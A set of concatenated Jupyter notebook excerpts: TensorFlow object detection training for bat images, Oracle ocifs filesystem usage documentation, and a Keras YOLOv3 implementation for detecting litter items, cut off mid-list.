DOWNLOAD_BASE = 'http://download.tensorflow.org/models/object_detection/tf2/20200711/'
DEST_DIR = 'tf_models/train_demo/rcnn/pretrained_model'
if not (os.path.exists(MODEL_FILE)):
urlretrieve(DOWNLOAD_BASE + MODEL_FILE, MODEL_FILE)
tar = tarfile.open(MODEL_FILE)
tar.extractall()
tar.close()
os.remove(MODEL_FILE)
if (os.path.exists(DEST_DIR)):
shutil.rmtree(DEST_DIR)
os.rename(MODEL, DEST_DIR)
# SSD Model
if not (os.path.exists('tf_models/train_demo/ssd')):
!mkdir tf_models/train_demo/ssd
if not (os.path.exists('tf_models/train_demo/ssd/pretrained_model')):
!mkdir tf_models/train_demo/ssd/pretrained_model
if not (os.path.exists('tf_models/train_demo/ssd/finetuned_model')):
!mkdir tf_models/train_demo/ssd/finetuned_model
if not (os.path.exists('tf_models/train_demo/ssd/trained')):
!mkdir tf_models/train_demo/ssd/trained
# Download the model
MODEL = 'ssd_mobilenet_v2_320x320_coco17_tpu-8'
MODEL_FILE = MODEL + '.tar.gz'
DOWNLOAD_BASE = 'http://download.tensorflow.org/models/object_detection/tf2/20200711/'
DEST_DIR = 'tf_models/train_demo/ssd/pretrained_model'
if not (os.path.exists(MODEL_FILE)):
urlretrieve(DOWNLOAD_BASE + MODEL_FILE, MODEL_FILE)
tar = tarfile.open(MODEL_FILE)
tar.extractall()
tar.close()
os.remove(MODEL_FILE)
if (os.path.exists(DEST_DIR)):
shutil.rmtree(DEST_DIR)
os.rename(MODEL, DEST_DIR)
```
### Convert training data to tf.record format
1) Download generate_tfrecord.py using code block below
2) Open the Colab file explorer on the right and navigate to your current working directory
3) Double click on generate_tfrecord.py to open it in the Colab text editor.
4) Modify the file for your train dataset:
* update label names to the class(es) of interest at line 31 (Chiroptera)
# TO-DO replace this with label map
def class_text_to_int(row_label):
if row_label == 'Chiroptera':
return 1
else:
None
* update the filepath where you want your train tf.record file to save at line 85
# TO-DO replace path with your filepath
def main(_):
writer = tf.python_io.TFRecordWriter('/content/drive/MyDrive/[yourfilepath]/tf.record')
5) Close Colab text editor and proceed with steps below to generate tf.record files for your test and train datasets
```
# Download chiroptera_generate_tfrecord.py to your wd in Google Drive
# Follow directions above to modify the file for your dataset
!gdown --id 1fVXeuk7ALHTlTLK3GGH8p6fMHuuWt1Sr
# Convert crops_test to tf.record format for test data
# Modified from https://tensorflow-object-detection-api-tutorial.readthedocs.io/en/latest/training.html
# TO DO: Update file paths in form fields
csv_input = "/content/drive/MyDrive/train/tf2/pre-processing/Chiroptera_crops_test_notaug_oob_rem_fin.csv" #@param {type:"string"}
output_path = "/content/drive/MyDrive/train/tf2/test_images/tf.record" #@param {type:"string"}
test_image_dir = "/content/drive/MyDrive/train/tf2/test_images" #@param {type:"string"}
!python chiroptera_generate_tfrecord.py --csv_input=$csv_input --output_path=$output_path --image_dir=$test_image_dir
# Move tf.record for test images to test images directory
!mv tf.record $image_dir
# Convert crops_train to tf.record format for train data
# Modified from https://tensorflow-object-detection-api-tutorial.readthedocs.io/en/latest/training.html
# TO DO: Update file paths in form fields
csv_input = "/content/drive/MyDrive/train/tf2/pre-processing/Chiroptera_crops_train_aug_oob_rem_fin.csv" #@param {type:"string"}
output_path = "/content/drive/MyDrive/train/tf2/images/tf.record" #@param {type:"string"}
train_image_dir = "/content/drive/MyDrive/train/tf2/images" #@param {type:"string"}
global image_dir
!python chiroptera_generate_tfrecord.py --csv_input=$csv_input --output_path=$output_path --image_dir=$train_image_dir
# Move tf.record for training images to train images directory
!mv tf.record $image_dir
```
### Make label map for class Chiroptera
```
%%writefile labelmap.pbtxt
item {
id: 1
name: 'Chiroptera'
}
```
### Modify model config files for training Faster-RCNN and SSD with your dataset
If you have errors with training, check the pipline_config_path and model_dir in the config files for R-FCN or Faster-RCNN model
```
# Adjust model config file based on training/testing datasets
# Modified from https://stackoverflow.com/a/63645324
from google.protobuf import text_format
from object_detection.protos import pipeline_pb2
%cd $wd
# TO DO: Adjust parameters ## add form fields here
filter = "Chiroptera" #@param {type:"string"}
config_basepath = "tf_models/train_demo/" #@param {type:"string"}
label_map = 'labelmap.pbtxt'
train_tfrecord_path = "/content/drive/MyDrive/train/tf2/images/tf.record" #@param {type:"string"}
test_tfrecord_path = "/content/drive/MyDrive/train/tf2/test_images/tf.record" #@param {type:"string"}
ft_ckpt_basepath = "/content/drive/MyDrive/train/tf2/tf_models/train_demo/" #@param {type:"string"}
ft_ckpt_type = "detection" #@param ["detection", "classification"]
num_classes = 1 #@param
batch_size = 1 #@param ["1", "4", "8", "16", "32", "64", "128"] {type:"raw"}
# Define pipeline for modifying model config files
def read_config(model_config):
if 'rcnn/' in model_config:
model_ckpt = 'rcnn/pretrained_model/checkpoint/ckpt-0'
elif 'ssd/' in model_config:
model_ckpt = 'ssd/pretrained_model/checkpoint/ckpt-0'
config_fpath = config_basepath + model_config
pipeline = pipeline_pb2.TrainEvalPipelineConfig()
with tf.io.gfile.GFile(config_fpath, "r") as f:
proto_str = f.read()
text_format.Merge(proto_str, pipeline)
return pipeline, model_ckpt, config_fpath
def modify_config(pipeline, model_ckpt, ft_ckpt_basepath):
finetune_checkpoint = ft_ckpt_basepath + model_ckpt
pipeline.model.faster_rcnn.num_classes = num_classes
pipeline.train_config.fine_tune_checkpoint = finetune_checkpoint
pipeline.train_config.fine_tune_checkpoint_type = ft_ckpt_type
pipeline.train_config.batch_size = batch_size
pipeline.train_config.use_bfloat16 = False # True only if training on TPU
pipeline.train_input_reader.label_map_path = label_map
pipeline.train_input_reader.tf_record_input_reader.input_path[0] = train_tfrecord_path
pipeline.eval_input_reader[0].label_map_path = label_map
pipeline.eval_input_reader[0].tf_record_input_reader.input_path[0] = test_tfrecord_path
return pipeline
def write_config(pipeline, config_fpath):
config_outfpath = os.path.splitext(config_fpath)[0] + '_' + filter + '.config'
config_text = text_format.MessageToString(pipeline)
with tf.io.gfile.GFile(config_outfpath, "wb") as f:
f.write(config_text)
return config_outfpath
def setup_pipeline(model_config, ft_ckpt_basepath):
print('\n Modifying model config file for {}'.format(model_config))
pipeline, model_ckpt, config_fpath = read_config(model_config)
pipeline = modify_config(pipeline, model_ckpt, ft_ckpt_basepath)
config_outfpath = write_config(pipeline, config_fpath)
print(' Modifed model config file saved to {}'.format(config_outfpath))
if config_outfpath:
return "Success!"
else:
return "Fail: try again"
# Modify model configs
model_configs = ['rcnn/pretrained_model/pipeline.config', 'ssd/pretrained_model/pipeline.config']
[setup_pipeline(model_config, ft_ckpt_basepath) for model_config in model_configs]
```
## Train
---
```
# Determine how many train and eval steps to use based on dataset size
# TO DO: Only need to update path if you didn't just run "Model Preparation" block above
try:
train_image_dir
except NameError:
train_image_dir = "/content/drive/MyDrive/train/tf2/images" #@param {type:"string"}
examples = len(os.listdir(train_image_dir))
print("Number of train examples: \n", examples)
# Get the number of testing examples
# TO DO: Only need to update path if you didn't just run "Model Preparation" block above
try:
test_image_dir
except NameError:
test_image_dir = "/content/drive/MyDrive/train/tf2/test_images" #@param {type:"string"}
test_examples = len(os.listdir(test_image_dir))
print("Number of test examples: \n", test_examples)
# Get the training batch size
# TO DO: Only need to update value if you didn't just run "Model Preparation" block above
try:
batch_size
except NameError:
batch_size = 1 #@param ["1", "4", "8", "16", "32", "64", "128"] {type:"raw"}
print("Batch size: \n", batch_size)
# Calculate roughly how many steps to use for training and testing
steps_per_epoch = examples / batch_size
num_eval_steps = test_examples / batch_size
print("Number of steps per training epoch: \n", int(steps_per_epoch))
print("Number of evaluation steps: \n", int(num_eval_steps))
# TO DO: Choose how many epochs to train for
epochs = 410 #@param {type:"slider", min:10, max:1000, step:100}
num_train_steps = int(epochs * steps_per_epoch)
num_eval_steps = int(num_eval_steps)
# TO DO: Choose paths for RCNN or SSD model
pipeline_config_path = "tf_models/train_demo/rcnn/pretrained_model/pipeline_Chiroptera.config" #@param ["tf_models/train_demo/rcnn/pretrained_model/pipeline_Chiroptera.config", "tf_models/train_demo/ssd/pretrained_model/pipeline_Chiroptera.config"]
model_dir = "tf_models/train_demo/rcnn/trained" #@param ["tf_models/train_demo/rcnn/trained", "tf_models/train_demo/ssd/trained"]
output_directory = "tf_models/train_demo/rcnn/finetuned_model" #@param ["tf_models/train_demo/rcnn/finetuned_model", "tf_models/train_demo/ssd/finetuned_model"]
trained_checkpoint_dir = "tf_models/train_demo/rcnn/trained" #@param ["tf_models/train_demo/rcnn/trained", "tf_models/train_demo/ssd/trained"] {allow-input: true}
# Save vars to environment for access with cmd line tools below
os.environ["trained_checkpoint_dir"] = "trained_checkpoint_dir"
os.environ["num_train_steps"] = "num_train_steps"
os.environ["num_eval_steps"] = "num_eval_steps"
os.environ["pipeline_config_path"] = "pipeline_config_path"
os.environ["model_dir"] = "model_dir"
os.environ["output_directory"] = "output_directory"
# Optional: Visualize training progress with Tensorboard
# Load the TensorBoard notebook extension
%load_ext tensorboard
# Log training progress using TensorBoard
%tensorboard --logdir $model_dir
# Actual training
# Note: You can change the number of epochs in code block below and re-run to train longer
# Modified from https://github.com/RomRoc/objdet_train_tensorflow_colab/blob/master/objdet_custom_tf_colab.ipynb
matplotlib.use('Agg')
%cd $wd
!python tf_models/models/research/object_detection/model_main_tf2.py \
--alsologtostderr \
--num_train_steps=$num_train_steps \
--num_eval_steps=$num_eval_steps \
--pipeline_config_path=$pipeline_config_path \
--model_dir=$model_dir
# Export trained model
# Modified from https://github.com/RomRoc/objdet_train_tensorflow_colab/blob/master/objdet_custom_tf_colab.ipynb
%cd $wd
# Save the model
!python tf_models/models/research/object_detection/exporter_main_v2.py \
--input_type image_tensor \
--pipeline_config_path=$pipeline_config_path \
--trained_checkpoint_dir=$trained_checkpoint_dir \
--output_directory=$output_directory
# Evaluate trained model to get mAP and IoU stats for COCO 2017
# Change pipeline_config_path and checkpoint_dir when switching between SSD and Faster-RCNN models
matplotlib.use('Agg')
!python tf_models/models/research/object_detection/model_main_tf2.py \
--alsologtostderr \
--model_dir=$model_dir \
--pipeline_config_path=$pipeline_config_path \
--checkpoint_dir=$trained_checkpoint_dir
```
|
github_jupyter
|
Copyright (c) 2021, 2022 Oracle and/or its affiliates.
Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/
## Unix Operations
_Important: The ocifs SDK isn't a one-to-one adaptor of OCI Object Storage and UNIX filesystem operations. It's a set of convenient wrappings to assist Pandas in natively reading from Object Storage. It supports many of the common UNIX functions, and many of the Object Storage API though not all._
Following are examples of some of the most popular filesystem and file methods. First, you must instantiate your region-specific filesystem instance:
```
from ocifs import OCIFileSystem
fs = OCIFileSystem(config="~/.oci/config")
```
### Filesystem Operations
#### list
List the files in a bucket or subdirectory using `ls`:
```
fs.ls("bucket@namespace/")
# ['bucket@namespace/file.txt',
# 'bucket@namespace/data.csv',
# 'bucket@namespace/folder1/',
# 'bucket@namespace/folder2/']
```
`list` has the following args: 1) `compartment_id`: a specific compartment from which to list. 2)`detail`: If true, return a list of dictionaries with various details about each object. 3)`refresh`: If true, ignore the cache and pull fresh.
```
fs.ls("bucket@namespace/", detail=True)
# [{'name': 'bucket@namespace/file.txt',
# 'etag': 'abcdefghijklmnop',
# 'type': 'file',
# 'timeCreated': <timestamp when artifact created>,
# ... },
# ...
# ]
```
#### touch
The UNIX `touch` command creates empty files in Object Storage. The `data` parameter accepts a bytestream and writes it to the new file.
```
fs.touch("bucket@namespace/newfile", data=b"Hello World!")
fs.cat("bucket@namespace/newfile")
# "Hello World!"
```
#### copy
The `copy` method is a popular UNIX method, and it has a special role in ocifs as the only method capable of cross-tenancy calls. Your IAM Policy must permit you to read and write cross-region to use the `copy` method cross-region. Note: Another benefit of `copy` is that it can move large data between locations in Object Storage without needing to store anything locally.
```
fs.copy("bucket@namespace/newfile", "bucket@namespace/newfile-sydney",
destination_region="ap-sydney-1")
```
#### rm
The `rm` method is another essential UNIX filesystem method. It accepts one additional argument (beyond the path), `recursive`. When `recursive=True`, it is equivalent to an `rm -rf` command. It deletes all files underneath the prefix.
```
fs.exists("oci://bucket@namespace/folder/file")
# True
fs.rm("oci://bucket@namespace/folder", recursive=True)
fs.exists("oci://bucket@namespace/folder/file")
# False
```
#### glob
Fsspec implementations, including ocifs, support UNIX glob patterns, see [Globbing](https://man7.org/linux/man-pages/man7/glob.7.html).
```
fs.glob("oci://bucket@namespace/folder/*.csv")
# ["bucket@namespace/folder/part1.csv", "bucket@namespace/folder/part2.csv"]
```
Dask has special support for reading from and writing to a set of files using glob expressions (Pandas doesn't support glob), see [Dask's Glob support](https://docs.dask.org/en/latest/remote-data-services.html).
```
from dask import dataframe as dd
ddf = dd.read_csv("oci://bucket@namespace/folder/*.csv")
ddf.to_csv("oci://bucket@namespace/folder_copy/*.csv")
```
#### walk
Use the UNIX `walk` method for iterating through the subdirectories of a given path. This is a valuable method for determining every file within a bucket or folder.
```
fs.walk("oci://bucket@namespace/folder")
# ["bucket@namespace/folder/part1.csv", "bucket@namespace/folder/part2.csv",
# "bucket@namespace/folder/subdir/file1.csv", "bucket@namespace/folder/subdir/file2.csv"]
```
#### open
This method opens a file and returns an `OCIFile` object. There are examples of what you can do with an `OCIFile` in the next section.
### File Operations
After calling open, you get an `OCIFile` object, which is subclassed from fsspec's `AbstractBufferedFile`. This file object can do almost everything a UNIX file can. Following are a few examples, see [a full list of methods](https://filesystem-spec.readthedocs.io/en/latest/api.html?highlight=AbstractFileSystem#fsspec.spec.AbstractBufferedFile).
#### read
The `read` method works exactly as you would expect with a UNIX file:
```
import fsspec
with fsspec.open("oci://bucket@namespace/folder/file", 'rb') as f:
buffer = f.read()
with fs.open("oci://bucket@namespace/folder/file", 'rb') as f:
buffer = f.read()
file = fs.open("oci://bucket@namespace/folder/file")
buffer = file.read()
file.close()
```
#### seek
The `seek` method is also valuable in navigating files:
```
fs.touch("bucket@namespace/newfile", data=b"Hello World!")
with fs.open("bucket@namespace/newfile") as f:
f.seek(3)
print(f.read(1))
f.seek(0)
print(f.read(1))
# l
# H
```
#### write
You can use the `write` operation:
```
with fsspec.open("oci://bucket@namespace/newfile", 'wb') as f:
buffer = f.write(b"new text")
with fsspec.open("oci://bucket@namespace/newfile", 'rb') as f:
assert f.read() == b"new text"
```
### Learn More
There are many more operations that you can use with `ocifs`, see the [AbstractBufferedFile spec](https://filesystem-spec.readthedocs.io/en/latest/api.html?highlight=AbstractFileSystem#fsspec.spec.AbstractBufferedFile) and the [AbstractFileSystem spec](https://filesystem-spec.readthedocs.io/en/latest/api.html?highlight=AbstractFileSystem#fsspec.spec.AbstractFileSystem).
|
github_jupyter
|
## **Yolov3 Algorithm**
```
import struct
import numpy as np
import pandas as pd
import os
from keras.layers import Conv2D
from keras.layers import Input
from keras.layers import BatchNormalization
from keras.layers import LeakyReLU
from keras.layers import ZeroPadding2D
from keras.layers import UpSampling2D
from keras.layers.merge import add, concatenate
from keras.models import Model
```
**Access Google Drive**
```
# Load the Drive helper and mount
from google.colab import drive
drive.mount('/content/drive')
```
**Residual Block**
formula: y=F(x) + x
```
def _conv_block(inp, convs, skip=True):
x = inp
count = 0
for conv in convs:
if count == (len(convs) - 2) and skip:
skip_connection = x
count += 1
if conv['stride'] > 1: x = ZeroPadding2D(((1,0),(1,0)))(x) #padding as darknet prefer left and top
x = Conv2D(conv['filter'],
conv['kernel'],
strides=conv['stride'],
padding='valid' if conv['stride'] > 1 else 'same', # padding as darknet prefer left and top
name='conv_' + str(conv['layer_idx']),
use_bias=False if conv['bnorm'] else True)(x)
if conv['bnorm']: x = BatchNormalization(epsilon=0.001, name='bnorm_' + str(conv['layer_idx']))(x)
if conv['leaky']: x = LeakyReLU(alpha=0.1, name='leaky_' + str(conv['layer_idx']))(x)
return add([skip_connection, x]) if skip else x
```
**Create Yolov3 Architecture**
Three output layers: 82, 94, 106
```
def make_yolov3_model():
input_image = Input(shape=(None, None, 3))
# Layer 0 => 4
x = _conv_block(input_image, [{'filter': 32, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 0},
{'filter': 64, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 1},
{'filter': 32, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 2},
{'filter': 64, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 3}])
# Layer 5 => 8
x = _conv_block(x, [{'filter': 128, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 5},
{'filter': 64, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 6},
{'filter': 128, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 7}])
# Layer 9 => 11
x = _conv_block(x, [{'filter': 64, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 9},
{'filter': 128, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 10}])
# Layer 12 => 15
x = _conv_block(x, [{'filter': 256, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 12},
{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 13},
{'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 14}])
# Layer 16 => 36
for i in range(7):
x = _conv_block(x, [{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 16+i*3},
{'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 17+i*3}])
skip_36 = x
# Layer 37 => 40
x = _conv_block(x, [{'filter': 512, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 37},
{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 38},
{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 39}])
# Layer 41 => 61
for i in range(7):
x = _conv_block(x, [{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 41+i*3},
{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 42+i*3}])
skip_61 = x
# Layer 62 => 65
x = _conv_block(x, [{'filter': 1024, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 62},
{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 63},
{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 64}])
# Layer 66 => 74
for i in range(3):
x = _conv_block(x, [{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 66+i*3},
{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 67+i*3}])
# Layer 75 => 79
x = _conv_block(x, [{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 75},
{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 76},
{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 77},
{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 78},
{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 79}], skip=False)
# Layer 80 => 82
yolo_82 = _conv_block(x, [{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 80},
{'filter': 54, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False, 'layer_idx': 81}], skip=False)
# Layer 83 => 86
x = _conv_block(x, [{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 84}], skip=False)
x = UpSampling2D(2)(x)
x = concatenate([x, skip_61])
# Layer 87 => 91
x = _conv_block(x, [{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 87},
{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 88},
{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 89},
{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 90},
{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 91}], skip=False)
# Layer 92 => 94
yolo_94 = _conv_block(x, [{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 92},
{'filter': 54, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False, 'layer_idx': 93}], skip=False)
# Layer 95 => 98
x = _conv_block(x, [{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 96}], skip=False)
x = UpSampling2D(2)(x)
x = concatenate([x, skip_36])
# Layer 99 => 106
yolo_106 = _conv_block(x, [{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 99},
{'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 100},
{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 101},
{'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 102},
{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 103},
{'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 104},
{'filter': 54, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False, 'layer_idx': 105}], skip=False)
model = Model(input_image, [yolo_82, yolo_94, yolo_106])
return model
```
**Read and Load the pre-trained model weight**
```
class WeightReader:
def __init__(self, weight_file):
with open(weight_file, 'rb') as w_f:
major, = struct.unpack('i', w_f.read(4))
minor, = struct.unpack('i', w_f.read(4))
revision, = struct.unpack('i', w_f.read(4))
if (major*10 + minor) >= 2 and major < 1000 and minor < 1000:
w_f.read(8)
else:
w_f.read(4)
transpose = (major > 1000) or (minor > 1000)
binary = w_f.read()
self.offset = 0
self.all_weights = np.frombuffer(binary, dtype='float32')
def read_bytes(self, size):
self.offset = self.offset + size
return self.all_weights[self.offset-size:self.offset]
def load_weights(self, model):
for i in range(106):
try:
conv_layer = model.get_layer('conv_' + str(i))
print("loading weights of convolution #" + str(i))
if i not in [81, 93, 105]:
norm_layer = model.get_layer('bnorm_' + str(i))
size = np.prod(norm_layer.get_weights()[0].shape)
beta = self.read_bytes(size) # bias
gamma = self.read_bytes(size) # scale
mean = self.read_bytes(size) # mean
var = self.read_bytes(size) # variance
weights = norm_layer.set_weights([gamma, beta, mean, var])
if len(conv_layer.get_weights()) > 1:
bias = self.read_bytes(np.prod(conv_layer.get_weights()[1].shape))
kernel = self.read_bytes(np.prod(conv_layer.get_weights()[0].shape))
kernel = kernel.reshape(list(reversed(conv_layer.get_weights()[0].shape)))
kernel = kernel.transpose([2,3,1,0])
conv_layer.set_weights([kernel, bias])
else:
kernel = self.read_bytes(np.prod(conv_layer.get_weights()[0].shape))
kernel = kernel.reshape(list(reversed(conv_layer.get_weights()[0].shape)))
kernel = kernel.transpose([2,3,1,0])
conv_layer.set_weights([kernel])
except ValueError:
print("no convolution #" + str(i))
def reset(self):
self.offset = 0
```
**Define the model**
```
model = make_yolov3_model()
```
**Call class WeightReader to read the weight & load to the model**
```
weight_reader = WeightReader("/content/drive/MyDrive/yolo_custom_model_Training/backup/test_cfg_20000.weights")
weight_reader.load_weights(model)
```
**We will use a pre-trained model to perform object detection**
```
import numpy as np
from matplotlib import pyplot
from matplotlib.patches import Rectangle
from numpy import expand_dims
from keras.models import load_model
from keras.preprocessing.image import load_img
from keras.preprocessing.image import img_to_array
# define the expected input shape for the model
input_w, input_h = 416, 416
```
**Draw bounding box on the images**
```
class BoundBox:
def __init__(self, xmin, ymin, xmax, ymax, objness = None, classes = None):
self.xmin = xmin
self.ymin = ymin
self.xmax = xmax
self.ymax = ymax
self.objness = objness
self.classes = classes
self.label = -1
self.score = -1
def get_label(self):
if self.label == -1:
self.label = np.argmax(self.classes)
return self.label
def get_score(self):
if self.score == -1:
self.score = self.classes[self.get_label()]
return self.score
def _sigmoid(x):
return 1. / (1. + np.exp(-x))
def decode_netout(netout, anchors, obj_thresh, net_h, net_w):
grid_h, grid_w = netout.shape[:2] # 0 and 1 is row and column 13*13
nb_box = 3 # 3 anchor boxes
netout = netout.reshape((grid_h, grid_w, nb_box, -1)) #13*13*3 ,-1
nb_class = netout.shape[-1] - 5
boxes = []
netout[..., :2] = _sigmoid(netout[..., :2])
netout[..., 4:] = _sigmoid(netout[..., 4:])
netout[..., 5:] = netout[..., 4][..., np.newaxis] * netout[..., 5:]
netout[..., 5:] *= netout[..., 5:] > obj_thresh
for i in range(grid_h*grid_w):
row = i / grid_w
col = i % grid_w
for b in range(nb_box):
# 4th element is objectness score
objectness = netout[int(row)][int(col)][b][4]
if(objectness.all() <= obj_thresh): continue
# first 4 elements are x, y, w, and h
x, y, w, h = netout[int(row)][int(col)][b][:4]
x = (col + x) / grid_w # center position, unit: image width
y = (row + y) / grid_h # center position, unit: image height
w = anchors[2 * b + 0] * np.exp(w) / net_w # unit: image width
h = anchors[2 * b + 1] * np.exp(h) / net_h # unit: image height
# last elements are class probabilities
classes = netout[int(row)][col][b][5:]
box = BoundBox(x-w/2, y-h/2, x+w/2, y+h/2, objectness, classes)
boxes.append(box)
return boxes
def correct_yolo_boxes(boxes, image_h, image_w, net_h, net_w):
new_w, new_h = net_w, net_h
for i in range(len(boxes)):
x_offset, x_scale = (net_w - new_w)/2./net_w, float(new_w)/net_w
y_offset, y_scale = (net_h - new_h)/2./net_h, float(new_h)/net_h
boxes[i].xmin = int((boxes[i].xmin - x_offset) / x_scale * image_w)
boxes[i].xmax = int((boxes[i].xmax - x_offset) / x_scale * image_w)
boxes[i].ymin = int((boxes[i].ymin - y_offset) / y_scale * image_h)
boxes[i].ymax = int((boxes[i].ymax - y_offset) / y_scale * image_h)
```
**Intersection over Union - Actual bounding box vs predicted bounding box**
```
def _interval_overlap(interval_a, interval_b):
x1, x2 = interval_a
x3, x4 = interval_b
if x3 < x1:
if x4 < x1:
return 0
else:
return min(x2,x4) - x1
else:
if x2 < x3:
return 0
else:
return min(x2,x4) - x3
#intersection over union
def bbox_iou(box1, box2):
intersect_w = _interval_overlap([box1.xmin, box1.xmax], [box2.xmin, box2.xmax])
intersect_h = _interval_overlap([box1.ymin, box1.ymax], [box2.ymin, box2.ymax])
intersect = intersect_w * intersect_h
w1, h1 = box1.xmax-box1.xmin, box1.ymax-box1.ymin
w2, h2 = box2.xmax-box2.xmin, box2.ymax-box2.ymin
#Union(A,B) = A + B - Inter(A,B)
union = w1*h1 + w2*h2 - intersect
return float(intersect) / union
```
**Non Max Suppression - Only choose the high probability bounding boxes**
```
#boxes from correct_yolo_boxes and decode_netout
def do_nms(boxes, nms_thresh):
if len(boxes) > 0:
nb_class = len(boxes[0].classes)
else:
return
for c in range(nb_class):
sorted_indices = np.argsort([-box.classes[c] for box in boxes])
for i in range(len(sorted_indices)):
index_i = sorted_indices[i]
if boxes[index_i].classes[c] == 0: continue
for j in range(i+1, len(sorted_indices)):
index_j = sorted_indices[j]
if bbox_iou(boxes[index_i], boxes[index_j]) >= nms_thresh:
boxes[index_j].classes[c] = 0
```
**Load and Prepare images**
```
def load_image_pixels(filename, shape):
# load the image to get its shape
image = load_img(filename) #load_img() Keras function to load the image .
width, height = image.size
# load the image with the required size
image = load_img(filename, target_size=shape) # target_size argument to resize the image after loading
# convert to numpy array
image = img_to_array(image)
# scale pixel values to [0, 1]
image = image.astype('float32')
image /= 255.0 #rescale the pixel values from 0-255 to 0-1 32-bit floating point values.
# add a dimension so that we have one sample
image = expand_dims(image, 0)
return image, width, height
```
**Save all of the boxes above the threshold**
```
def get_boxes(boxes, labels, thresh):
v_boxes, v_labels, v_scores = list(), list(), list()
# enumerate all boxes
for box in boxes:
# enumerate all possible labels
for i in range(len(labels)):
# check if the threshold for this label is high enough
if box.classes[i] > thresh:
v_boxes.append(box)
v_labels.append(labels[i])
v_scores.append(box.classes[i]*100)
return v_boxes, v_labels, v_scores
```
**Draw all the boxes based on the information from the previous step**
```
def draw_boxes(filename, v_boxes, v_labels, v_scores):
# load the image
data = pyplot.imread(filename)
# plot the image
pyplot.imshow(data)
# get the context for drawing boxes
ax = pyplot.gca()
# plot each box
for i in range(len(v_boxes)):
#by retrieving the coordinates from each bounding box and creating a Rectangle object.
box = v_boxes[i]
# get coordinates
y1, x1, y2, x2 = box.ymin, box.xmin, box.ymax, box.xmax
# calculate width and height of the box
width, height = x2 - x1, y2 - y1
# create the shape
rect = Rectangle((x1, y1), width, height, fill=False, color='white')
# draw the box
ax.add_patch(rect)
# draw text and score in top left corner
label = "%s (%.3f)" % (v_labels[i], v_scores[i])
pyplot.text(x1, y1, label, color='white')
# show the plot
pyplot.show()
draw_boxes
```
### **Detection**
```
%cd '/content/drive/MyDrive/yolo_custom_model_Training/custom_data/'
input_w, input_h = 416, 416
anchors = [[116,90, 156,198, 373,326], [30,61, 62,45, 59,119], [10,13, 16,30, 33,23]]
class_threshold = 0.15
pred_right = 0
labels = ['clear_plastic_bottle','plastic_bottle_cap','drink_can','plastic_straw','paper_straw',
